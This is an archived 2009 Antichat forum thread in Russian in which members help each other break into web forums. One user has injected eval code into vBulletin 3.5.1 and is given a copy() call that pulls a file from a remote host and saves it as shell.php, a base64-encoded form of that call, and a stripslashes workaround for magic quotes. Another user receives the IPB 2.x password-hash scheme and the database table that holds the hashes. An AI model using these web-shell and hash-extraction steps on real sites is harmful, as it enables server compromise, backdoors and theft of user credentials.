ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.09.2009, 17:09
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
Плиз, дайте чёткие указание как залить шелл в vbulitin 3.5.1, я писал код в модулях,
местоположение faq_comlete, код например
copy("http://ааа/file.txt","./shell.php");
при заходе на faq.php? выскакивали "ошибки содержимого", шелл не залился. Но когда вписал
то заработало faq?e=phpinfo();
Дайте пожалуйста чёткие указания, какой код вписать в faq.?e= |
|
|
16.09.2009, 17:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');
|
|
|
|
16.09.2009, 17:15
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
Сообщение от mailbrush
Код:
e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');
там магические кавычки в ON
|
|
|
|
16.09.2009, 17:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Explоit
там магические кавычки в ON
eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));
|
|
|
|
16.09.2009, 17:23
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
Сообщение от geezer.code
eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));
Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)
Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?
|
|
|
|
16.09.2009, 21:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Explоit
Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)
Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?
Директива magic_quotes_gpc действует ТОЛЬКО на значения Get, Post и Cookie.
|
|
|
|
16.09.2009, 17:32
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
А root не пользователь? И поимев рута у тебя есть большая вероятность поиметь обычного пользователя.
ЗЫ: и експлоиты не обязательно повышают права до рута...
|
|
|
|
16.09.2009, 18:01
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Как можно залить в IPB шелл и где в БД храняться хэши паролей?
PS есть доступ на чтение БД
Версия форума 2.3.6
Последний раз редактировалось Byrger; 16.09.2009 в 18:16..
|
|
|
|
16.09.2009, 20:22
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от Byrger
Как можно залить в IPB шелл и где в БД храняться хэши паролей?
PS есть доступ на чтение БД
Версия форума 2.3.6
1) IPB 2.x.x - md5(md5($salt).md5($pass)), префикс - whb_, таблица - members_converge, salt - 5 символов
2) https://forum.antichat.ru/threadedpost1095553.html
|
|
|
|
16.09.2009, 22:57
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Что можно сделать с таким?
http://bestquest.info/test.php
upd: аа... Ясно... Это просто корень сайта в корне сервера лежит 
Последний раз редактировалось mailbrush; 16.09.2009 в 23:02..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид